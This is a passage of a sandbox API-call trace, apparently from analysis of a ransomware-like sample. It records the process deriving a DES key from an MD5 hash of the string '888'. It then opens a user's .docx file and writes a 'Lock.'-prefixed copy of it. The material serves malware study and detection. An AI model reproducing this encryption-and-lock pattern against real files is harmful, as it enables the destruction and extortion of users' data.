lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.150] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.150] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.150] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.150] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.150] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.150] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.150] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.150] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabcf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.150] CryptCreateHash (in: hProv=0xa7bc48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.150] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ea8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.151] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.151] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabc20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.151] CryptHashData (hHash=0x9e1c38, pbData=0x2a71de8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.151] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.151] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.151] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.151] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.151] CryptDeriveKey (in: hProv=0xa7bc48, Algid=0x6601, hBaseData=0x9e1c38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0215.154] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.154] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.154] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.154] CryptDestroyHash (hHash=0x9e1c38) returned 1 [0215.155] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/4pPJKhvtklZXxwQ0M09.docx" (normalized: "c:\\users\\fd1hvy\\documents\\4ppjkhvtklzxxwq0m09.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0215.155] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.155] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0215.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854a10 [0215.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.157] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854a10 | out: hHeap=0x2af0000) returned 1 [0215.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0215.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0215.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0215.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.4pPJKhvtklZXxwQ0M09.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.4ppjkhvtklzxxwq0m09.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0215.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ea020 [0215.163] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.163] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x67d6, lpOverlapped=0x0) returned 1 [0215.165] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67d6) returned 0x2a8a138 [0215.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ea020 | out: hHeap=0x2af0000) returned 1 [0215.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67d6) returned 0x2a90918 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67d6) returned 0x2a8a138 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0215.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0215.170] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0215.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0215.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67d6) returned 0x2a8a138 [0215.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0215.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0215.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0215.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0215.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67d6) returned 0x2a970f8 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 